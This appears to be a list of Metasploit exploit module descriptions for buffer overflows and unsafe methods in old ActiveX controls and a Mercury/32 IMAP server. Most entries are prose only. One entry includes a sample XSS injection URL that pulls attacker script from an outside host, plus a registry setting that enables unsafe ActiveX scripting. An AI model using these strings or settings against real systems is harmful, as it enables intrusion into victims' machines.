This module allows attackers to execute code via an unsafe method in Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0).
This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the 'HTMLURL' parameter an attacker can execute arbitrary code.
The vulnerability allows an attacker to include files from a remote server, potentially leading to remote code execution or information disclosure.
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.
This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing an overly long string via the "target-frame" parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The "operation" variable must be set to a valid command in order to reach this vulnerability.
This module allows attackers to execute code via the 'WriteFile' unsafe method of Chilkat Software Inc's Crypt ActiveX control. This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to execute our payload immediately. However, this method requires that the victim user be browsing with Administrator. Additionally, this method will not work on newer versions of Windows. NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.
This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code.
This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the 'ExtractIptc()' property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.
This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to save binary data to the file system, ADODB.Stream access is required, which in IE7 will trigger a cross domain access violation. As such, we write the code to a .vbs file and execute it from there, where no such restrictions exist.When set via domain policy, the most common registry entry to modify is HKLM SoftwarePoliciesMicrosoftWindowsCurrentVersionInternet SettingsZones11201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone.This module creates a javascript/html hybrid that will render correctly either via a direct GET http://msf-server/ or as a javascript include, such as in: http://intranet-server/xss.asp?id="%3E%3Cscript%20src=http://10.10.10.10/ie_unsafe_script.js>%3C/script%3E.
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).